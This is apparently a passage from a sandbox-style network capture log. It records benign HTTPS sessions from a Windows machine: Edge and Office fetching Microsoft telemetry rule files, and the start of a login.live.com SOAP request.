encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	49818	94.245.104.56	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:42 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-02 16:56:42 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Sat, 02 Nov 2024 16:56:42 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=af27587ba86e2e2aa791a52417aa6c585c82244cf3bd8746d9cd4bf5c38fbf44;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=af27587ba86e2e2aa791a52417aa6c585c82244cf3bd8746d9cd4bf5c38fbf44;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.7	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:42 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:43 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 8f98044c-301e-006e-14bd-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-16547b76f7fnm7lfhC1DFWkxt400000000w00000000065rc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:43 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.7	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:42 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:43 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 3caab4b0-601e-005c-26d2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-15869dbbcc65c582hC1DFW2xkc00000000kg00000000du3b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:43 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.7	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:42 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:43 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 3caab57d-601e-005c-6cd2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-16547b76f7f9rdn9hC1DFWfk7s00000000v000000000fwv1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:43 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.7	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:43 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:43 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-15869dbbcc68l9dbhC1DFW29n000000000u000000000bztb x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:43 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.7	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:43 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:43 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 134b8558-a01e-0098-752e-2c8556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-176bd8f9bc59g2s2hC1DFWby1800000002eg00000000d5br x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:43 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.7	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:43 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:44 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-16547b76f7fx6rhxhC1DFW76kg00000000ug00000000hex6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:44 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.7	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:43 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:44 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-16547b76f7fj5p7mhC1DFWf8w40000000120000000006tm1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:44 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.7	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:43 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:44 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:43 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165643Z-16547b76f7f9rdn9hC1DFWfk7s00000000vg00000000ekvw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:44 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.7	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:43 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:44 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:44 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165644Z-16547b76f7fq9mcrhC1DFWq15w00000000zg0000000019u5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:44 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.7	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:43 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:44 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:44 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: c9b06975-e01e-0051-49ff-2b84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165644Z-176bd8f9bc5dfnrlhC1DFW9ueg00000002m000000000cavm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:44 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.7	49832	20.190.159.4	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:44 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-02 16:56:44 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
